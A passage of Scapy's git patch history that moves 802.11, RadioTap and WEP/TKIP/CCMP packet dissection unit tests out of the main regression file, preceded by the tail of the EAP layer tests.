b'\x02\x9f\x01L+\x01\x16\x03\x01\x01\x06\x10\x00\x01\x02\x01\x00Y\xc9\x8a\tcw\t\xdcbU\xfd\x035\xcd\x1a\t\x10f&[(9\xf6\x88W`\xc6\x0f\xb3\x84\x15\x19\xf5\tk\xbd\x8fp&0\xb0\xa4B\x85\x0c<:s\xf2zT\xc3\xbd\x8a\xe4D{m\xe7\x97\xfe>\xda\x14\xb8T1{\xd7H\x9c\xa6\xcb\xe3,u\xdf\xe0\x82\xe5R\x1e<\xe5\x03}\xeb\x98\xe2\xf7\x8d3\xc6\x83\xac"\x8f\xd7\x12\xe5{:"\x84A\xd9\x14\xc2cZF\xd4\t\xab\xdar\xc7\xe0\x0e\x00o\xce\x05g\xdc?\xcc\xf7\xe83\x83E\xb3>\xe8<3-QB\xfd$C/\x1be\xcf\x03\xd6Q4\xbe\\h\xba)<\x99N\x89\xd9\xb1\xfa!\xd7a\xef\xa3\xd3o\xed8Uz\xb5k\xb0`\xfeC\xbc\xb3aS,d\xe6\xdc\x13\xa4A\x1e\x9b\r{\xd6s \xd0cQ\x95y\xc8\x1d\xc3\xd9\x87\xf2=\x81\x96q~\x99E\xc3\x97\xa8px\xe2\xc7\x92\xeb\xff/v\x84\x1e\xfb\x00\x95#\xba\xfb\xd88h\x90K\xa7\xbd9d\xb4\xf2\xf2\x14\x02vtW\xaa\xadY\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000\x97\xc5l\xd6\xef\xffcM\x81\x90Q\x96\xf6\xfeX1\xf7\xfc\x84\xc6\xa0\xf6Z\xcd\xb6\xe1\xd4\xdb\x88\xf9t%Q!\xe7,~#2G-\xdf\x83\xbf\x86Q\xa2$' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 159) +assert(eap.len == 332) +assert(eap.type == 43) +assert(eap.haslayer(EAP_FAST)) +assert(eap[EAP_FAST].L == 0) +assert(eap[EAP_FAST].M == 0) +assert(eap[EAP_FAST].S == 0) +assert(eap[EAP_FAST].version == 1) + += EAP - Dissection (7) +s = b'\x02\xf1\x00\t\x03\r\x15\x19+' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 241) +assert(eap.len == 9) +assert(eap.type == 3) +assert(hasattr(eap, 'desired_auth_types')) +assert(eap.desired_auth_types == [13,21,25,43]) + += EAP - Dissection (8) +s = b"\x02\x03\x01\x15\x15\x00\x16\x03\x01\x01\n\x01\x00\x01\x06\x03\x03\xd5\xd9\xd5rT\x9e\xb8\xbe,>\xcf!\xcf\xc7\x02\x8c\xb1\x1e^F\xf7\xc84\x8c\x01t4\x91[\x02\xc8/\x00\x00\x8c\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\x00\xa5\x00\xa3\x00\xa1\x00\x9f\x00k\x00j\x00i\x00h\x009\x008\x007\x006\x00\x88\x00\x87\x00\x86\x00\x85\xc02\xc0.\xc0*\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0/\xc0+\xc0'\xc0#\xc0\x13\xc0\t\x00\xa4\x00\xa2\x00\xa0\x00\x9e\x00g\x00@\x00?\x00>\x003\x002\x001\x000\x00\x9a\x00\x99\x00\x98\x00\x97\x00E\x00D\x00C\x00B\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\xff\x01\x00\x00Q\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x1c\x00\x1a\x00\x17\x00\x19\x00\x1c\x00\x1b\x00\x18\x00\x1a\x00\x16\x00\x0e\x00\r\x00\x0b\x00\x0c\x00\t\x00\n\x00\r\x00 \x00\x1e\x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x00\x0f\x00\x01\x01" +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 3) +assert(eap.len == 277) +assert(eap.type == 21) +assert(eap.haslayer(EAP_TTLS)) +assert(eap[EAP_TTLS].L == 0) +assert(eap[EAP_TTLS].M == 0) +assert(eap[EAP_TTLS].S == 0) +assert(eap[EAP_TTLS].version == 0) + += EAP - EAP_TLS - Basic Instantiation +raw(EAP_TLS()) == b'\x01\x00\x00\x06\r\x00' + += EAP - EAP_FAST - Basic Instantiation +raw(EAP_FAST()) == b'\x01\x00\x00\x06+\x00' + += EAP - EAP_TTLS - Basic Instantiation +raw(EAP_TTLS()) == b'\x01\x00\x00\x06\x15\x00' + += EAP - EAP_PEAP - Basic Instantiation +raw(EAP_PEAP()) == b'\x01\x00\x00\x06\x19\x01' + += EAP - EAP_MD5 - Basic Instantiation +raw(EAP_MD5()) == b'\x01\x00\x00\x06\x04\x00' + += EAP - EAP_MD5 - Request - Dissection (8) +s = b'\x01\x02\x00\x16\x04\x10\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eap = EAP(s) +assert(eap.code == 1) +assert(eap.id == 2) +assert(eap.len == 22) +assert(eap.type == 4) +assert(eap.haslayer(EAP_MD5)) +assert(eap[EAP_MD5].value_size == 16) +assert(eap[EAP_MD5].value == b'\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb') +assert(eap[EAP_MD5].optional_name == b'') + += EAP - EAP_MD5 - Response - Dissection (9) +s = b'\x02\x02\x00\x16\x04\x10\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 2) +assert(eap.len == 22) +assert(eap.type == 4) +assert(eap.haslayer(EAP_MD5)) +assert(eap[EAP_MD5].value_size == 16) +assert(eap[EAP_MD5].value == b'\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf') +assert(eap[EAP_MD5].optional_name == b'') + += EAP - LEAP - Basic Instantiation +raw(LEAP()) == b'\x01\x00\x00\x08\x11\x01\x00\x00' + += EAP - LEAP - Request - Dissection (10) +s = b'\x01D\x00\x1c\x11\x01\x00\x088\xb6\xd7\xa1E\x9a9\x8a[\x91\xe1U\xfa\xb6H\xd1\xbd\x9b\xd5\xadl\rV\x00\x00\x02\x00/\x01\x00' +eap = EAP_PEAP(s) +assert(eap.code == 2) +assert(eap.id == 3) +assert(eap.len == 56) +assert(eap.type == 25) +assert(eap.haslayer(EAP_PEAP)) +assert(eap[EAP_PEAP].S == 0) +assert(eap[EAP_PEAP].version == 1) +assert(hasattr(eap[EAP_PEAP], "tls_data")) + += EAP - Layers (1) +eap = EAP_MD5() +assert(EAP_MD5 in eap) +assert(not EAP_TLS in eap) +assert(not EAP_FAST in eap) +assert(not LEAP in eap) +assert(EAP in eap) +eap = EAP_TLS() +assert(EAP_TLS in eap) +assert(not EAP_MD5 in eap) +assert(not EAP_FAST in eap) +assert(not LEAP in eap) +assert(EAP in eap) +eap = EAP_FAST() +assert(EAP_FAST in eap) +assert(not EAP_MD5 in eap) +assert(not EAP_TLS in eap) +assert(not LEAP in eap) +assert(EAP in eap) +eap = EAP_TTLS() +assert(EAP_TTLS in eap) +assert(not EAP_MD5 in eap) +assert(not EAP_TLS in eap) +assert(not EAP_FAST in eap) +assert(not LEAP in eap) +assert(EAP in eap) +eap = EAP_PEAP() +assert(EAP_PEAP in eap) +assert(EAP in eap) +eap = LEAP() +assert(not EAP_MD5 in eap) +assert(not EAP_TLS in eap) +assert(not EAP_FAST in eap) +assert(LEAP in eap) +assert(EAP in eap) + += EAP - Layers (2) +eap = EAP_MD5() +assert(type(eap[EAP]) == EAP_MD5) +eap = EAP_TLS() +assert(type(eap[EAP]) == EAP_TLS) +eap = EAP_FAST() +assert(type(eap[EAP]) == EAP_FAST) +eap = EAP_TTLS() +assert(type(eap[EAP]) == EAP_TTLS) +eap = EAP_PEAP() +assert(type(eap[EAP]) == EAP_PEAP) +eap = LEAP() +assert(type(eap[EAP]) == LEAP) + += EAP - sessions (1) +p = IP()/TCP()/EAP() +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 + += EAP - sessions (2) +p = IP()/UDP()/EAP() +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 From 3583ea21f6273c5a431ccd66f5e44fe290ad362b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 20 Oct 2020 17:01:23 +0200 Subject: [PATCH 0333/1632] Standalone Dot11 unit tests Co-authored-by: Phil Co-authored-by: Pierre Lorinquer Co-authored-by: Gabriel Co-authored-by: alexandre.tanem@orange.fr Co-authored-by: Pierre LALET Co-authored-by: hennadii.demchenko Co-authored-by: Adrian Granados --- test/regression.uts | 565 ------------------------------------ test/scapy/layers/dot11.uts | 563 +++++++++++++++++++++++++++++++++++ 2 files changed, 563 insertions(+), 565 deletions(-) create mode 100644 test/scapy/layers/dot11.uts diff --git a/test/regression.uts b/test/regression.uts index 64dc8f36e36..a2a40290425 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1271,170 +1271,6 @@ y[TFTP_Option:2].oname assert(len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize") -############ -############ -+ Dot11 tests - -= Dot11FCS parent matching - -pkt = Ether()/IP()/Dot11FCS() -assert pkt[Dot11] - -= Dot11FCS - test FCS with FCSField - -data = b'\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x85\t\xa0\x00\xe2\x00d\x00\x00\x00\x00\x00\x00\x01\xa0@:\x01\x00\xc0\xca\xa4}PLfA\xac\xe4\xb3\x00\xc0\xca\xa4}P\x00\x03\x00 \x08 \x00\x00\x00\x00\x0f)\x1d\xd4\xd49\x1f>4\xeb' -pkt = RadioTap(data) -w_payload = hex_bytes('00002000ae4000a0200800a02008000010028509a000e2006400000000000001a0403a0100c0caa47d504c6641ace4b300c0caa47d50000300200820000000000f291dd4d4391f3e34eb') -assert raw(pkt) == w_payload - -= Dot11FCS computation - -pkt = RadioTap() / Dot11FCS() / Dot11Beacon() -assert raw(pkt) == b'\x00\x00\t\x00\x02\x00\x00\x00\x10\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00\x00\x00e\xd9=\xb9' - -= WEP tests -~ wifi crypto Dot11 LLC SNAP IP TCP -conf.wepkey = "" -bck_conf_crypto_valid = conf.crypto_valid -p = Dot11WEP(b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd') -assert isinstance(p, Dot11WEP) -conf.crypto_valid = bck_conf_crypto_valid - -conf.wepkey = "Fobar" -r = raw(Dot11WEP()/LLC()/SNAP()/IP()/TCP(seq=12345678)) -r -assert(r == b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd') -p = Dot11WEP(r) -p -assert(TCP in p and p[TCP].seq == 12345678) - -= RadioTap - dissection & build -data = b'\x00\x008\x00k\x084\x00oo\x0f\x98\x00\x00\x00\x00\x10\x00\x99\x16@\x01\xc5\xa1\x01\x00\x00\x00@\x01\x02\x00\x99\x16\x9d"\x05\x0b\x00\x00\x00\x00\x00\x00\xff\x01\x16\x01\x82\x00\x00\x00\x01\x00\x00\x00\x88\x020\x00\xb8\xe8VB_\xb2\x82*\xa8Uq\x15\xf0\x9f\xc2\x11\x16dP\xb0\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x00GC\xad@\x007\x11\x97;\xd0C\xde{\xac\x10\r\xee\x005\xed\xec\x003\xd5/\xfc\\\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\tlocalhost\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\t:\x80\x00\x04\x7f\x00\x00\x01\xcdj\x88]' -r = RadioTap(data) -r = RadioTap(raw(r)) -assert r.dBm_AntSignal == -59 -assert r.ChannelFrequency == 5785 -assert r.ChannelPlusFrequency == 5785 -assert r.present == 3410027 -assert r.A_MPDU_ref == 2821 -assert r.KnownVHT == 511 -assert r.PresentVHT == 22 -assert r.notdecoded == b'' - -= RadioTap Big-Small endian dissection -data = b'\x00\x00\x1a\x00/H\x00\x00\xe1\xd3\xcb\x05\x00\x00\x00\x00@0x\x14@\x01\xac\x00\x00\x00' -r = RadioTap(data) -r.show() -assert r.present == 18479 - -= RadioTap MCS dissection -data = b"\x00\x00\x0b\x00\x00\x00\x08\x00?,\x05" -r = RadioTap(data) -r.show() -assert r.present.MCS -assert r.knownMCS.MCS_bandwidth -assert r.knownMCS.MCS_index -assert r.knownMCS.guard_interval -assert r.knownMCS.HT_format -assert r.knownMCS.FEC_type -assert r.knownMCS.STBC_streams -assert not r.knownMCS.Ness -assert not r.knownMCS.Ness_MSB -assert r.MCS_bandwidth == 0 -assert r.guard_interval == 1 -assert r.HT_format == 1 -assert r.FEC_type == 0 -assert r.STBC_streams == 1 -assert r.MCS_index == 5 -assert r.Ness_LSB == 0 - -= RadioTap RX/TX Flags dissection -data = b'\x00\x00\x0c\x00\x00\xc0\x00\x00\x02\x00\x3f\x00' -r = RadioTap(data) -r.show() -assert r.present.TXFlags -assert r.TXFlags.TX_FAIL -assert r.TXFlags.CTS -assert r.TXFlags.RTS -assert r.TXFlags.NOACK -assert r.TXFlags.NOSEQ -assert r.TXFlags.ORDER -assert r.present.RXFlags -assert r.RXFlags.BAD_PLCP - -= RadioTap, other fields - -data = b'\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x85\t\xa0\x00\xe2\x00d\x00\x00\x00\x00\x00\x00\x01\xa0@:\x01\x00\xc0\xca\xa4}PLfA\xac\xe4\xb3\x00\xc04\xeb\xca\xa4}P\x00 \x08 \x00\x00\x00\x00\x0f)\x1d\xd4\xd49\x00\x03\x1f>' -r = RadioTap(data) -assert Dot11TKIP in r -assert r[Dot11] -assert r.dBm_AntSignal == -30 -assert r.Lock_Quality == 100 -assert r.RXFlags == 0 - -= RadioTap - Dissection - guess_payload_class() test -data = b'\x00\x00\r\x00\x04\x80\x02\x00\x02\x00\x00\x00\x00@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xe8\x94\xf6\x1c\xdf\x8b\xff\xff\xff\xff\xff\xff\xa0\x01\x00\x10ciscosb-wpa2-eap\x01\x08\x02\x04\x0b\x16\x0c\x12\x18$2\x040H`l\x03\x01\x01-\x1an\x11\x1b\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -radiotap = RadioTap(data) -assert radiotap.present.Rate -assert radiotap.present.TXFlags -assert radiotap.present.b18 -assert radiotap.present == 163844 -assert radiotap.guess_payload_class("") == Dot11 - -= RadioTap - Dissection with Extended presence mask -data = b"\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x9e\t\xa0\x00\xa2\x00d\x00\x00\x00\x00\x00\x00\x01\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x94S0\xe8\x93\xb2\x94S0\xe8\x93\xb2\xf0u\x85\xe1H\x9c\x08\x00\x00\x00d\x00\x11\x14\x00\x08Why Fye?\x01\x08\x82\x84\x8b\x96$0Hl\x03\x01\x0b\x05\x04\x00\x01\x00\x00*\x01\x04/\x01\x040\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x0c\x002\x04\x0c\x12\x18`\x0b\x05\x07\x00;\x00\x00-\x1a\xad\x19\x17\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x0b\x08\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x04\x00\x08\x00\x00\x00\x00@\xdd1\x00P\xf2\x04\x10J\x00\x01\x10\x10D\x00\x01\x02\x10G\x00\x10\xef\xda]\xd2#\xe8\xa7\xf0\xb2/\xa4\x98\xbf\x0cv\xe7\x10<\x00\x01\x03\x10I\x00\x06\x007*\x00\x01 \xdd\t\x00\x10\x18\x02\x07\x00\x1c\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00F\x05r\x08\x01\x00\x00\xdd\x1e\x00\x90L\x04\x08\xbf\x0c\xb2Y\x82\x0f\xea\xff\x00\x00\xea\xff\x00\x00\xc0\x05\x00\x0b\x00\x00\x00\xc3\x02\x00\x02\x08I\xc0\xdb" -radiotap = RadioTap(data) - -assert radiotap.present.Ext -assert len(radiotap.Ext) == 2 -assert radiotap.Ext[0].present.b5 -assert radiotap.Ext[0].present.b11 -assert radiotap.Ext[0].present.b29 -assert radiotap.Ext[0].present.Ext -assert radiotap.Ext[1].present.b37 -assert radiotap.Ext[1].present.b43 -assert not radiotap.Ext[1].present.Ext - -assert radiotap.present.Flags -assert radiotap.Flags.FCS -assert Dot11FCS in radiotap -assert radiotap.fcs == 0xdbc04908 - -assert Dot11EltRates in radiotap -assert radiotap[Dot11EltRates].rates == [130, 132, 139, 150, 36, 48, 72, 108] - -= RadioTap - Build with Extended presence mask - -a = RadioTapExtendedPresenceMask(present="b0+b12+b29+Ext") -b = RadioTapExtendedPresenceMask(index=1, present="b32+b45+b59+b62") -pkt = RadioTap(present="Ext", Ext=[a, b]) -assert raw(pkt) == b'\x00\x00\x10\x00\x00\x00\x00\x80\x01\x10\x00\xa0\x01 \x00H' - -= fuzz() calls for Dot11Elt() -for i in range(10): - assert isinstance(raw(fuzz(Dot11Elt())), bytes) - -= PMKIDListPacket - Check computation of nb_pmkids -assert PMKIDListPacket(raw(PMKIDListPacket())).nb_pmkids == 0 -assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["AZEDFREZSDERFGTY"]))).nb_pmkids == 1 -assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["0123456789ABDEFX", "AZEDFREZSDERFGTY"]))).nb_pmkids == 2 - -= Dot11EltRSN - Check computation of nb_pairwise_cipher_suites and nb_akm_suites -assert Dot11EltRSN(raw(Dot11EltRSN())).nb_pairwise_cipher_suites == 1 -assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 -assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP-128")]))).nb_pairwise_cipher_suites == 2 -assert Dot11EltRSN(raw(Dot11EltRSN())).nb_akm_suites == 1 -assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 -assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 - -= Dot11EltMicrosoftWPA - Check computation of nb_pairwise_cipher_suites and nb_akm_suites -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_pairwise_cipher_suites == 1 -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP-128")]))).nb_pairwise_cipher_suites == 2 -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_akm_suites == 1 -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 -assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 - ############ ############ + SNMP tests @@ -10246,407 +10082,6 @@ assert(p.params == []) param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() assert(param1.random != param2.random) -############ -############ -+ 802.11 -~ dot11 - -= 802.11 - misc -PrismHeader().answers(PrismHeader()) == True - -dpl = Dot11PacketList([Dot11()/LLC()/SNAP()/IP()/UDP()]) -len(dpl) == 1 - -dpl_ether = dpl.toEthernet() -len(dpl_ether) == 1 and Ether in dpl_ether[0] - -= Dot11 - build -s = raw(Dot11()) -s == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= Dot11 - dissection -p = Dot11(s) -Dot11 in p and p.addr3 == "00:00:00:00:00:00" -assert p.mysummary() == '802.11 Management Association Request 00:00:00:00:00:00 (TA=SA) > 00:00:00:00:00:00 (RA=DA)' -assert "DA" in p.address_meaning(1) -assert "SA" in p.address_meaning(2) -assert "BSSID" in p.address_meaning(3) - -= Dot11QoS - build -s = raw(Dot11()/Dot11QoS(Ack_Policy=1)) -assert s == b'\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00' - -s = raw(Dot11(type=2, subtype=8)/Dot11QoS(TID=4)) -assert s == b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' - -= Dot11 - binary in SSID -pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID=0, info=b"".join(chb(i) for i in range(32))) -pkt.show() -pkt.summary() -assert pkt[Dot11Elt::{"ID": 0}].summary() in [ - "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), - 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), -] -pkt = Dot11(raw(pkt)) -pkt.show() -pkt.summary() -assert pkt[Dot11Elt::{"ID": 0}].summary() in [ - "SSID='%s'" % "".join(repr(chr(d))[1:-1] for d in range(32)), - 'SSID="%s"' % "".join(repr(chr(d))[1:-1] for d in range(32)), -] - -= Dot11QoS - dissection -p = Dot11(s) -assert Dot11QoS in p -assert p.TID == 4 -assert "DA" in p.address_meaning(1) -assert "SA" in p.address_meaning(2) -assert "BSSID" in p.address_meaning(3) - -= Dot11 - answers -query = Dot11(type=0, subtype=0) -Dot11(type=0, subtype=1).answers(query) == True - -= Dot11 - misc -assert Dot11Elt(info="scapy").summary() == "SSID='scapy'" -assert Dot11Elt(ID=1).mysummary() == "" -assert Dot11(b'\x84\x00\x00\x00\x00\x11\x22\x33\x44\x55\x00\x11\x22\x33\x44\x55').addr2 == '00:11:22:33:44:55' - -= Multiple Dot11Elt layers -pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID="Supported Rates") / Dot11Elt(ID="SSID", info="Scapy") -assert pkt[Dot11Elt::{"ID": 0}].info == b"Scapy" -assert pkt.getlayer(Dot11Elt, ID=0).info == b"Scapy" - -= Dot11WEP - build -~ crypto -conf.wepkey = "" -assert raw(PPI()/Dot11(FCfield=0x40)/Dot11WEP()) == b'\x00\x00\x08\x00i\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -conf.wepkey = "test123" -assert raw(PPI()/Dot11(type=2, subtype=8, FCfield=0x40)/Dot11QoS()/Dot11WEP()) == b'\x00\x00\x08\x00i\x00\x00\x00\x88@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008(^a' - -= Dot11WEP - dissect -~ crypto -conf.wepkey = "test123" -a = PPI(b'\x00\x00\x08\x00i\x00\x00\x00\x88@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008(^a') -assert a[Dot11QoS][Dot11WEP].icv == 942169697 - -= Dot11TKIP - dissection - -pkt = RadioTap(b'\x00\x00\x0f\x00*\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x08B\x00\x00\xff\xff\xff\xff\xff\xff\xfe\xec\xda\x1d\xa3M\x00\x04t\x14\x02BP+\x01!\x00\xa0\x01!\x00\xa0\x01!\x00\xa0\x00\x00\x00\x00\xb0\xb6sN\xbdl9S\xc3x\x9d\xa6TEp\xcd(\xebht{\xff9\x9a[\x0f~\x00\xf8&m$\x1e\xd2[dXn\x16\x8526G\x8c\x88\xc3B\xc9\xda^\xc5w\xa5 \x9a\xa0 \x08') -assert Dot11TKIP in pkt - -assert pkt[Dot11TKIP].TSC1 == 1 -assert pkt[Dot11TKIP].WEPSeed == 33 -assert pkt[Dot11TKIP].TSC0 == 0 -assert pkt[Dot11TKIP].key_id == 2 -assert pkt[Dot11TKIP].ext_iv == 1 -assert pkt[Dot11TKIP].res == 0 -assert pkt[Dot11TKIP].TSC2 == 1 -assert pkt[Dot11TKIP].TSC3 == 33 -assert pkt[Dot11TKIP].TSC4 == 0 -assert pkt[Dot11TKIP].TSC5 == 160 - -assert "DA" in pkt[Dot11].address_meaning(1) -assert "TA=BSSID" in pkt[Dot11].address_meaning(2) -assert "SA" in pkt[Dot11].address_meaning(3) - -= Dot11CCMP - dissection - -pkt = RadioTap(b'\x00\x00\x0f\x00*\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x08b\x00\x00\x01\x00^\x7f\xff\xfa\x0e\xec\xda\x1d\xa3M\x00\x0eX7\xbe\xbe\x00\x8aD#\x00\xa0D#\x00\xa0\x00\x00\x00\x00c\xb7\rv/s\x88N;>\x07\x0e\xe5\xd9\xf5\xfa\xcdD\xc2he\xfc\xc5^m\xae\xf2\xfe\xf9\xb06\xce\rt\xbe\x9d(\xb5\x98\x848NU\x0f\x93\x0f]m\xa2\x96\x80{\x95\x00\xb5\x98Y!\xa3^\xfc\xda\xca.R\xf3\xd3\xf8^\xeda\x88\x82p\xc6\xb8L\x0b\x815-\x85(\xb1F\xd5K\x166dJ\xc7\x04B\xdb\xec\x8d\xb7:{\x0f\'g<\x06\xd07>\xde\xad\x08\xcb\xffr\xfa\xf4}o\xe9\xa9b\xa5)\x87\x90\xa5{\xe1\xea\x0f\x0fGf`x1\xbd\xc1\xe8\xa0\xb6(\x05gq\xf3\x99\x9e\x93\xde\'\x8e\nQ\xf7\xad\xf7\x89"\xee\xcf\xe8$\x8a\x9c\xb4\xe6\x03\xab\x9ec\xd0\xd5\x08\xca\xd2\xbb\xae\xcc\x9c$R\xbc\xcdFO?\xc3Ah\x9ch\xd4\x9b)m\xea\xbab+\'\x06I2\xb5!\xdb\x03\xbe\xb8\xb2\x86\x0f\x80\n\xbc\x85\x02\xb4T\x00\x00\xc7|\xac\xc0B\xb2\x89\xbb\xc5\xc0\x93\x858\xe3Q\xf9\t\xff4\xdb\x9a>\xe5O-e\x16\x81w!9m\xb9dZ\xaa\xaa0\x9cW\xaa\xa3\xf1\xdd\xecW\xdd\xc41D\xe6\xba\xf3SQ\x81S\xf6\xbd\xe3\xc0e\xba\xa0*\x15%\x9cz0\xa8\xa6l\x8e\x0c(\xd3\xe4\xa2\xf9\xc2:Yae#T\x8d\xef\x01\xfad\x05/\xdb\xf2!D\xde~\x0f\x99\xf6U\xf5\xbf\xd0\xaf\xbe0\xf7\xf03\xa8s`\x8d>4\x98\xb5Y\x06dXFz\x88\x82\'B\x84\xe6\xca\x05\x02\xd5G\xb6\x11\xed <\xb1\xd4\xc9\xa9\xaa\xae\xc9\xb3g\xbc\xfd+\xe7\x1aG\x92\x17\xdb\xce\xf7\x843\xce4\xc4w\x8f\x8a\x83\xf0\'\xfe\x87\x14\x95\xd3\x0bM\xbaL$\xc8\x8d\' 8\x87c 3yt\xc5\xeeN\xc9\xe1\x95\x1d\xe9\xddh\x87E\x07\xe5\x86\xc7\x82\x8a\x88\x05\xa4\x06\xb1\x0c\xddV\xd0\xf0d\xc8\xcet`\xc5C\xcb\x8f\x06]A\x92\x1a\xae5wc\x8dN\xa2\xf0}aJ\x9c\x8e\xd1\xb2[*\xffK\x0f\xf8u\xd5\x84#\xc3"\xffX\x9f\xffC\x0fb\x02n\x1b\xbaAr\x93\xe1\xb7\x1f\x8e\x1c\xfev]w\xaa\xcch\x8c{lm\xb9\x9aE\x08\x1d\xc28u\x82\xa8\xbe\xf2\xb3\x11\xdc\x90 